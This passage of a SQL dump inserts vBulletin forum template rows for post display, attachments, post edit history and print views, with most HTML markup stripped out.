\r\n \r\n \".(($show[\'postedithistory\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[last_edited_link_by_x_on_y_at_z_postid]\", \"$post[edit_username]\", \"$post[edit_date]\", \"$post[edit_time]\", \"posthistory.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"p=$post[postid]\") . \"\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[last_edited_by_x_on_y_at_z]\", \"$post[edit_username]\", \"$post[edit_date]\", \"$post[edit_time]\") . \"\r\n \")).\"\r\n \".(($post[\'edit_reason\']) ? (\"\r\n $vbphrase[reason]: $post[edit_reason]\r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n \r\n \".(($post[\'editlink\']) ? (\"\r\n
\r\n
\r\n \") : (\"\")).\"\r\n \".(($post[\'forwardlink\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \".(($post[\'replylink\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'multiquote_post\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'quickreply\'] AND !$show[\'threadedmode\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'moderated\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'spam\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'deletedpost\']) ? (\"\r\n \".(($show[\'managepost\']) ? (\"\r\n
session->vars[\'sessionurl\'] . \"do=managepost&p=$post[postid]\\\"> \r\n \") : (\"\r\n
\r\n \")).\"\r\n \") : (\"\")).\"\r\n \".(($show[\'redcard\']) ? (\"\r\n
session->vars[\'sessionurl\'] . \"do=view&p=$post[postid]\\\"> \r\n \") : (\"\r\n \".(($show[\'yellowcard\']) ? (\"\r\n
session->vars[\'sessionurl\'] . \"do=view&p=$post[postid]\\\"> \r\n \") : (\"\")).\"\r\n \")).\"\r\n $template_hook[postbit_controls]\r\n \r\n
\r\n\r\n \r\n\r\n \r\n \r\n
\r\n$template_hook[postbit_end]\r\n\r\n\".(($show[\'profile\']) ? (\" \r\n\r\n\r\n\r\n\") : (\"\")).\"', '$template_hook[postbit_start]\r\n\r\n\r\n \r\n \r\n\r\n \r\n \r\n
\r\n
\r\n $post[postdate], $post[posttime] \r\n \r\n $vbphrase[x_until_y] \r\n \r\n $post[firstnewinsert]\r\n \r\n
\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n $vbphrase[xs_avatar]\" border=\"0\" /> \r\n \r\n\r\n \r\n\r\n $post[usertitle]
\r\n $post[rank]
\r\n $template_hook[postbit_userinfo_left]\r\n\r\n \r\n \r\n \r\n\r\n \r\n
$vbphrase[join_date]: $post[joindate]
\r\n
$vbphrase[location_perm]: $post[field2]
\r\n
$vbphrase[age]: $post[age]
\r\n
\r\n $vbphrase[posts]: $post[posts]\r\n
\r\n $template_hook[postbit_userinfo_right_after_posts]\r\n
$vbphrase[infractions]: $post[warnings]/$post[infractions] ($post[ipoints])
\r\n
$vbphrase[reppower]: $post[reppower] $post[reputationdisplay]
\r\n $template_hook[postbit_userinfo_right]\r\n
$post[icqicon] $post[aimicon] $post[msnicon] $post[yahooicon] $post[skypeicon]
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n $template_hook[postbit_messagearea_start]\r\n\r\n \r\n \r\n \r\n
\r\n
$post[title] \r\n
\r\n \r\n \r\n \r\n\r\n \r\n \r\n $ad_location[ad_showthread_firstpost_start]\r\n $post[message]\r\n
\r\n \r\n\r\n \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_thumbnails] \r\n \r\n $post[thumbnailattachments]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachments]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachmentlinks]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_files] \r\n \r\n $post[otherattachments]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attachments_pending_approval] \r\n \r\n $post[moderatedattachments]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n \r\n\r\n $template_hook[postbit_signature_start]\r\n $ad_location[ad_showthread_firstpost_sig]\r\n\r\n \r\n \r\n \r\n __________________ \r\n $post[signature]\r\n
\r\n \r\n \r\n\r\n $template_hook[postbit_signature_end]\r\n\r\n \r\n \r\n \r\n
\r\n
\r\n \r\n $vbphrase[last_edited_link_by_x_on_y_at_z_postid] \r\n \r\n $vbphrase[last_edited_by_x_on_y_at_z] \r\n \r\n \r\n $vbphrase[reason]: $post[edit_reason]\r\n \r\n \r\n
\r\n \r\n \r\n\r\n \r\n \r\n
\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n reply_small quote .gif\" alt=\"$vbphrase[reply_with_quote]\" border=\"0\" />\r\n \r\n
\r\n on off .gif\" alt=\"$vbphrase[multi_quote_this_message]\" border=\"0\" id=\"mq_$post[postid]\" />\r\n \r\n
\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n $template_hook[postbit_controls]\r\n \r\n
\r\n\r\n \r\n\r\n \r\n \r\n
\r\n$template_hook[postbit_end]\r\n\r\n \r\n\r\n\r\n\r\n ', 'template', 1280350744, 'vBulletin Solutions', '3.8.7 Beta 1', 'vbulletin'),
(1515, -1, 'postbit_attachment', '\r\n \r\n session->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&d=$attachment[dateline]\\\"\".(($show[\'newwindow\']) ? (\" target=\\\"_blank\\\"\") : (\"\")).\">$attachment[filename] ($attachment[filesize]\".(($show[\'views\']) ? (\", \" . construct_phrase(\"$vbphrase[x_views]\", \"$attachment[counter]\") . \"\") : (\"\")).\") \r\n ', '\r\n $vbphrase[file_type_x]\" width=\"16\" height=\"16\" border=\"0\" style=\"vertical-align:baseline\" /> \r\n target=\"_blank\">$attachment[filename] ($attachment[filesize], $vbphrase[x_views] ) \r\n ', 'template', 1219831366, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1516, -1, 'postbit_attachmentimage', ' session->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&stc=1&d=$attachment[dateline]\\\" border=\\\"0\\\" alt=\\\"\\\" /> ', ' ', 'template', 1105654461, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'),
(1517, -1, 'postbit_attachmentmoderated', '\r\n \r\n \".(($show[\'modattachmentlink\']) ? (\"session->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&d=$attachment[dateline]\\\"\".(($show[\'newwindow\']) ? (\" target=\\\"_blank\\\"\") : (\"\")).\">$attachment[filename] ($attachment[filesize])\") : (\"$attachment[filename]\")).\" \r\n ', '\r\n $vbphrase[file_type_x]\" width=\"16\" height=\"16\" border=\"0\" style=\"vertical-align:baseline\" /> \r\n target=\"_blank\" >$attachment[filename] ($attachment[filesize]) $attachment[filename] \r\n ', 'template', 1151091065, 'vBulletin Solutions', '3.6.0 Beta 4', 'vbulletin'),
(1518, -1, 'postbit_attachmentthumbnail', '\".(($show[\'cangetattachment\']) ? (\"\r\nsession->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&d=$attachment[dateline]\\\" rel=\\\"Lightbox_$post[postid]\\\" id=\\\"attachment$attachment[attachmentid]\\\"\".(($show[\'newwindow\']) ? (\" target=\\\"_blank\\\"\") : (\"\")).\"> session->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&stc=1&thumb=1&d=$attachment[thumbnail_dateline]\\\" border=\\\"0\\\" alt=\\\"\" . construct_phrase(\"$vbphrase[image_larger_version_x_y_z]\", \"$attachment[filename]\", \"$attachment[counter]\", \"$attachment[filesize]\", \"$attachment[attachmentid]\") . \"\\\" /> \r\n \".(($show[\'br\']) ? (\" \") : (\"\")).\"\r\n\") : (\"\r\nsession->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&d=$attachment[dateline]\\\" rel=\\\"nofollow\\\" id=\\\"attach$attachment[attachmentid]\\\"> session->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&stc=1&thumb=1&d=$attachment[thumbnail_dateline]\\\" border=\\\"0\\\" alt=\\\"$attachment[filename]\\\" /> \r\n \".(($show[\'br\']) ? (\" \") : (\"\")).\"\r\n\")).\"', '\r\n target=\"_blank\" > $vbphrase[image_larger_version_x_y_z]\" />\r\n \r\n \r\n \r\n \r\n', 'template', 1219929150, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1519, -1, 'postbit_automoderated', ' \r\n
\r\n
\r\n \r\n
\r\n
$post[username] \r\n $vbphrase[post_has_been_automoderated] \r\n
\r\n
', ' \r\n
\r\n
\r\n \r\n
\r\n
$post[username] \r\n $vbphrase[post_has_been_automoderated] \r\n
\r\n
', 'template', 1209557876, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1520, -1, 'postbit_deleted', '', '\r\n$vbphrase[post_x]\">\r\n \r\n \r\n \r\n \r\n $vbphrase[view_post] \r\n \r\n $post[postdate], $post[posttime] $post[firstnewinsert]\r\n \r\n \r\n\r\n \r\n \r\n $post[musername] $post[musername] \r\n \r\n \r\n\r\n \r\n\r\n \r\n
$vbphrase[message_deleted_by_x] \r\n
$vbphrase[reason]: $post[del_reason] \r\n
\r\n\r\n \r\n \r\n
', 'template', 1183466945, 'vBulletin Solutions', '3.6.8', 'vbulletin'),
(1521, -1, 'postbit_external', '$post[message]
\r\n\r\n\".(($show[\'attachments\']) ? (\"\r\n \r\n \r\n\r\n \".(($show[\'thumbnailattachment\']) ? (\"\r\n
\r\n $vbphrase[attached_thumbnails] \r\n \r\n $post[thumbnailattachments]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachment\']) ? (\"\r\n
\r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachments]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachmentlink\']) ? (\"\r\n
\r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachmentlinks]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'otherattachment\']) ? (\"\r\n
\r\n $vbphrase[attached_files] \r\n \r\n $post[otherattachments]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n\") : (\"\")).\"', '$post[message]
\r\n\r\n\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_thumbnails] \r\n \r\n $post[thumbnailattachments]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachments]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachmentlinks]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_files] \r\n \r\n $post[otherattachments]\r\n
\r\n \r\n \r\n\r\n
\r\n ', 'template', 1154367421, 'vBulletin Solutions', '3.6.0', 'vbulletin'),
(1522, -1, 'postbit_ignore', '', '', 'template', 1196095083, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1523, -1, 'postbit_ignore_global', '', '', 'template', 1167175129, 'vBulletin Solutions', '3.6.6', 'vbulletin'),
(1524, -1, 'postbit_ip', '\".(($show[\'ip\']) ? (\"\r\n $vbphrase[ip]: $post[ip]\r\n\") : (\"\r\n session->vars[\'sessionurl\'] . \"do=getip&p=$post[postid]\\\"> \r\n\")).\"', '\r\n $vbphrase[ip]: $post[ip]\r\n \r\n \r\n ', 'template', 1071580820, 'vBulletin Solutions', '', 'vbulletin'),
(1525, -1, 'postbit_legacy', '$template_hook[postbit_start]\r\n\r\n\r\n \".(($show[\'announcement\']) ? (\"\r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[x_until_y]\", \"$post[startdate]\", \"$post[enddate]\") . \"\r\n \r\n \") : (\"\r\n \r\n \r\n \r\n $post[postdate]\".((!$show[\'detailedtime\']) ? (\", $post[posttime]\") : (\"\")).\"\r\n $post[firstnewinsert]\r\n \r\n \r\n \r\n \r\n \".(($show[\'postcount\']) ? (\"#session->vars[\'sessionurl\'] . \"p=$post[postid]&postcount=$post[postcount]\\\" target=\\\"new\\\" rel=\\\"nofollow\\\" id=\\\"postcount$post[postid]\\\" name=\\\"$post[postcount]\\\">$post[postcount] \") : (\"\")).\"\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \")).\"\r\n \r\n\r\n \r\n\r\n \r\n\r\n \".(($post[\'usertitle\']) ? (\"$post[usertitle]
\") : (\"\")).\"\r\n \".(($post[\'rank\']) ? (\"$post[rank]
\") : (\"\")).\"\r\n $template_hook[postbit_userinfo_left]\r\n\r\n \".(($show[\'avatar\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n
\r\n \".(($post[\'joindate\']) ? (\"
$vbphrase[join_date]: $post[joindate]
\") : (\"\")).\"\r\n \".(($post[\'field2\']) ? (\"
$vbphrase[location_perm]: $post[field2]
\") : (\"\")).\"\r\n \".(($post[\'age\']) ? (\"
$vbphrase[age]: $post[age]
\") : (\"\")).\"\r\n
\r\n $vbphrase[posts]: $post[posts]\r\n
\r\n $template_hook[postbit_userinfo_right_after_posts]\r\n \".(($show[\'infraction\']) ? (\"
$vbphrase[infractions]: $post[warnings]/$post[infractions] ($post[ipoints])
\") : (\"\")).\"\r\n \".(($show[\'reputation\']) ? (\"\".(($show[\'reppower\']) ? (\"$vbphrase[reppower]:
$post[reppower] \") : (\"\")).\"
$post[reputationdisplay]
\") : (\"\")).\"\r\n $template_hook[postbit_userinfo_right]\r\n
$post[icqicon] $post[aimicon] $post[msnicon] $post[yahooicon] $post[skypeicon]
\r\n
\r\n\r\n \r\n \".(($show[\'moderated\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n $template_hook[postbit_messagearea_start]\r\n \".(($show[\'messageicon\'] OR $post[\'title\']) ? (\"\r\n \r\n \r\n \".(($show[\'messageicon\']) ? (\"
\") : (\"\")).\"\r\n \".(($post[\'title\']) ? (\"
$post[title] \") : (\"\")).\"\r\n
\r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n \r\n $ad_location[ad_showthread_firstpost_start]\r\n $post[message]\r\n
\r\n \r\n\r\n \".(($show[\'attachments\']) ? (\"\r\n \r\n \r\n\r\n \".(($show[\'thumbnailattachment\']) ? (\"\r\n
\r\n $vbphrase[attached_thumbnails] \r\n \r\n $post[thumbnailattachments]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachment\']) ? (\"\r\n
\r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachments]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachmentlink\']) ? (\"\r\n
\r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachmentlinks]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'otherattachment\']) ? (\"\r\n
\r\n $vbphrase[attached_files] \r\n \r\n $post[otherattachments]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'moderatedattachment\']) ? (\"\r\n
\r\n $vbphrase[attachments_pending_approval] \r\n \r\n $post[moderatedattachments]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n $template_hook[postbit_signature_start]\r\n $ad_location[ad_showthread_firstpost_sig]\r\n\r\n \".(($post[\'signature\']) ? (\"\r\n \r\n \r\n __________________ \r\n $post[signature]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n $template_hook[postbit_signature_end]\r\n\r\n \".(($show[\'postedited\']) ? (\"\r\n \r\n \r\n
\r\n \r\n \".(($show[\'postedithistory\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[last_edited_link_by_x_on_y_at_z_postid]\", \"$post[edit_username]\", \"$post[edit_date]\", \"$post[edit_time]\", \"posthistory.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"p=$post[postid]\") . \"\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[last_edited_by_x_on_y_at_z]\", \"$post[edit_username]\", \"$post[edit_date]\", \"$post[edit_time]\") . \"\r\n \")).\"\r\n \".(($post[\'edit_reason\']) ? (\"\r\n $vbphrase[reason]: $post[edit_reason]\r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n \r\n\r\n \r\n $post[onlinestatus]\r\n \".(($show[\'reputationlink\']) ? (\"\r\n \r\n \".(($show[\'popups\']) ? (\"\") : (\"\")).\"\r\n \") : (\"\")).\"\r\n \".(($show[\'infractionlink\']) ? (\"session->vars[\'sessionurl\'] . \"do=report&p=$post[postid]\\\" rel=\\\"nofollow\\\"> \") : (\"\")).\"\r\n \".(($show[\'reportlink\']) ? (\"session->vars[\'sessionurl\'] . \"p=$post[postid]\\\" rel=\\\"nofollow\\\"> \") : (\"\")).\"\r\n $post[iplogged]\r\n \r\n \r\n \".(($show[\'moderated\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \".(($post[\'editlink\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($post[\'forwardlink\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($post[\'replylink\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'multiquote_post\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'quickreply\'] AND !$show[\'threadedmode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'moderated\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'spam\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'deletedpost\']) ? (\"\r\n \".(($show[\'managepost\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=managepost&p=$post[postid]\\\"> \r\n \") : (\"\r\n \r\n \")).\"\r\n \") : (\"\")).\"\r\n \".(($show[\'redcard\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=view&p=$post[postid]\\\"> \r\n \") : (\"\r\n \".(($show[\'yellowcard\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=view&p=$post[postid]\\\"> \r\n \") : (\"\")).\"\r\n \")).\"\r\n $template_hook[postbit_controls]\r\n \r\n \r\n \r\n
\r\n$template_hook[postbit_end]\r\n\r\n\".(($show[\'profile\']) ? (\" \r\n\r\n\r\n\r\n\") : (\"\")).\"', '$template_hook[postbit_start]\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[x_until_y] \r\n \r\n \r\n \r\n \r\n \r\n $post[postdate], $post[posttime] \r\n $post[firstnewinsert]\r\n \r\n \r\n \r\n \r\n #$post[postcount] \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n\r\n $post[usertitle]
\r\n $post[rank]
\r\n $template_hook[postbit_userinfo_left]\r\n\r\n \r\n \r\n \r\n\r\n \r\n
\r\n
$vbphrase[join_date]: $post[joindate]
\r\n
$vbphrase[location_perm]: $post[field2]
\r\n
$vbphrase[age]: $post[age]
\r\n
\r\n $vbphrase[posts]: $post[posts]\r\n
\r\n $template_hook[postbit_userinfo_right_after_posts]\r\n
$vbphrase[infractions]: $post[warnings]/$post[infractions] ($post[ipoints])
\r\n
$vbphrase[reppower]: $post[reppower] $post[reputationdisplay]
\r\n $template_hook[postbit_userinfo_right]\r\n
$post[icqicon] $post[aimicon] $post[msnicon] $post[yahooicon] $post[skypeicon]
\r\n
\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n $template_hook[postbit_messagearea_start]\r\n \r\n \r\n \r\n
\r\n
$post[title] \r\n
\r\n \r\n \r\n \r\n\r\n \r\n \r\n $ad_location[ad_showthread_firstpost_start]\r\n $post[message]\r\n
\r\n \r\n\r\n \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_thumbnails] \r\n \r\n $post[thumbnailattachments]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachments]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachmentlinks]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_files] \r\n \r\n $post[otherattachments]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attachments_pending_approval] \r\n \r\n $post[moderatedattachments]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n \r\n\r\n $template_hook[postbit_signature_start]\r\n $ad_location[ad_showthread_firstpost_sig]\r\n\r\n \r\n \r\n \r\n __________________ \r\n $post[signature]\r\n
\r\n \r\n \r\n\r\n $template_hook[postbit_signature_end]\r\n\r\n \r\n \r\n \r\n
\r\n
\r\n \r\n $vbphrase[last_edited_link_by_x_on_y_at_z_postid] \r\n \r\n $vbphrase[last_edited_by_x_on_y_at_z] \r\n \r\n \r\n $vbphrase[reason]: $post[edit_reason]\r\n \r\n \r\n
\r\n \r\n \r\n\r\n \r\n \r\n\r\n \r\n $post[onlinestatus]\r\n \r\n \r\n \r\n \r\n $vbphrase[add_infraction_for_x]\" border=\"0\" /> \r\n \r\n $post[iplogged]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n reply_small quote .gif\" alt=\"$vbphrase[reply_with_quote]\" border=\"0\" />\r\n \r\n \r\n on off .gif\" alt=\"$vbphrase[multi_quote_this_message]\" border=\"0\" id=\"mq_$post[postid]\" />\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $template_hook[postbit_controls]\r\n \r\n \r\n \r\n
\r\n$template_hook[postbit_end]\r\n\r\n \r\n\r\n\r\n\r\n ', 'template', 1280350756, 'vBulletin Solutions', '3.8.7 Beta 1', 'vbulletin'),
(1526, -1, 'postbit_onlinestatus', '\".(($onlinestatus==0) ? (\" \") : (\"\")).\"\r\n\".(($onlinestatus==1) ? (\" \") : (\"\")).\"\r\n\".(($onlinestatus==2) ? (\" \") : (\"\")).\"', ' $vbphrase[x_is_offline]\" border=\"0\" /> \r\n $vbphrase[x_is_online_now]\" border=\"0\" /> \r\n $vbphrase[x_is_invisible]\" border=\"0\" /> ', 'template', 1071580897, 'vBulletin Solutions', '', 'vbulletin'),
(1527, -1, 'postbit_quickedit', '\".(($show[\'quick_edit_form_tag\']) ? (\"\") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n \".(($show[\'editor_toolbar\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n
$newpost[message]
\r\n
\r\n
$vbphrase[reason_for_editing]:
\r\n
\r\n
\r\n
\r\n\r\n \r\n\r\n \r\n\r\n \".(($show[\'deletepostoption\']) ? (\"\r\n \r\n\r\n
\r\n\r\n
\r\n
$vbphrase[delete_message_check_appropriate_option]
\r\n \".(($show[\'firstpostnote\']) ? (\"\r\n
$vbphrase[deleting_message_deletion_of_thread]
\r\n \") : (\"\")).\"\r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \r\n\r\n
\r\n\r\n
\r\n \") : (\"\")).\"\r\n\r\n \r\n \r\n
\r\n\r\n\".(($show[\'quick_edit_form_tag\']) ? (\" \") : (\"\")).\"', ' \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n
$newpost[message]
\r\n
\r\n
$vbphrase[reason_for_editing]:
\r\n
\r\n
\r\n
\r\n\r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n
\r\n\r\n
\r\n
$vbphrase[delete_message_check_appropriate_option]
\r\n
\r\n $vbphrase[deleting_message_deletion_of_thread]
\r\n \r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \r\n\r\n
\r\n\r\n
\r\n \r\n\r\n \r\n \r\n
\r\n\r\n ', 'template', 1237516405, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
(1528, -1, 'postbit_reputation', ' ', ' ', 'template', 1071580916, 'vBulletin Solutions', '', 'vbulletin'),
(1529, -1, 'postbit_wrapper', '\r\n\".(($show[\'spacer\']) ? (\"\r\n $spacer_open\r\n \r\n \".((!$post[\'islastshown\']) ? (\"\") : (\"\")).\"\r\n\") : (\"\")).\"\r\n\r\n$postbit\r\n\r\n\".(($show[\'spacer\']) ? (\"\r\n
\r\n $spacer_close\r\n\") : (\"\")).\"\r\n', '\r\n\r\n $spacer_open\r\n \r\n \r\n\r\n\r\n$postbit\r\n\r\n\r\n
\r\n $spacer_close\r\n \r\n', 'template', 1192531778, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1530, -1, 'posthistory', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n\r\n\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[post_edit_history] \r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\".(($show[\'comparetable\']) ? (\"\r\n \r\n\r\n
$vbphrase[post_comparison]
\r\n\r\n \".(($show[\'titlecompare\']) ? (\"\r\n
$vbphrase[title_changes]
\r\n\r\n
\r\n \r\n - \r\n $oldtitle \r\n \r\n \r\n + \r\n $newtitle \r\n \r\n
\r\n\r\n
$vbphrase[text_changes]
\r\n \") : (\"\")).\"\r\n\r\n
\r\n \".(($comparebits) ? (\"\r\n $comparebits\r\n \") : (\"\r\n $vbphrase[must_select_two_version_comparison] \r\n \")).\"\r\n
\r\n
\r\n\") : (\"\")).\"\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n\r\n\r\n$vboptions[bbtitle] - $vbphrase[post_edit_history] \r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n
$vbphrase[post_comparison]
\r\n\r\n
\r\n $vbphrase[title_changes]
\r\n\r\n \r\n \r\n - \r\n $oldtitle \r\n \r\n \r\n + \r\n $newtitle \r\n \r\n
\r\n\r\n $vbphrase[text_changes]
\r\n \r\n\r\n
\r\n \r\n $comparebits\r\n \r\n $vbphrase[must_select_two_version_comparison] \r\n \r\n
\r\n
\r\n \r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876572, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1531, -1, 'posthistory_content_changed', '\".(($compare_show[olddata]) ? (\"\r\n\r\n - \r\n $compare_show[olddata] \r\n \r\n\") : (\"\")).\"\r\n\".(($compare_show[newdata]) ? (\"\r\n\r\n + \r\n $compare_show[newdata] \r\n \r\n\") : (\"\")).\"\r\n', '\r\n\r\n - \r\n $compare_show[olddata] \r\n \r\n \r\n\r\n\r\n + \r\n $compare_show[newdata] \r\n \r\n \r\n', 'template', 1194539281, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1532, -1, 'posthistory_content_not_changed', '\r\n \r\n $compare_show[olddata] \r\n ', '\r\n \r\n $compare_show[olddata] \r\n ', 'template', 1194539311, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1533, -1, 'posthistory_listbit', '\r\n \r\n \r\n \".(($history[\'reason\'] != \'\') ? (\"$history[reason]\") : (\"$vbphrase[n_a]\")).\" \r\n session->vars[\'sessionurl\'] . \"u=$history[userid]\\\">$history[username] \r\n $history[strdate] $history[strtime] \r\n \r\n', '\r\n \r\n \r\n $history[reason] $vbphrase[n_a] \r\n $history[username] \r\n $history[strdate] $history[strtime] \r\n \r\n', 'template', 1194539334, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1534, -1, 'posticonbit', ' \r\n \r\n', ' \r\n \r\n', 'template', 1067721767, 'vBulletin Solutions', '', 'vbulletin'),
(1535, -1, 'posticons', '\".(($show[\'posticons\']) ? (\"\r\n \r\n \r\n $vbphrase[post_icons] \r\n \r\n \r\n\") : (\"\r\n \r\n\")).\"', '\r\n \r\n \r\n $vbphrase[post_icons] \r\n \r\n \r\n \r\n \r\n ', 'template', 1223460202, 'vBulletin Solutions', '3.8.0 Alpha 2', 'vbulletin'),
(1536, -1, 'printthread', '$stylevar[htmldoctype]\r\n\r\n\r\n \r\n options[\'templateversion\'] . \"\\\" />\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $threadinfo[prefix_plain_html] $threadinfo[title] \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n -
$foruminfo[title] \r\n (
\" . $GLOBALS[\'vbulletin\']->options[\'bburl\'] . \"/forumdisplay.php?f=$foruminfo[forumid] )\r\n
\r\n\r\n - - $threadinfo[prefix_rich]
$threadinfo[title] \r\n (
\" . $GLOBALS[\'vbulletin\']->options[\'bburl\'] . \"/showthread.php?t=$threadid )\r\n
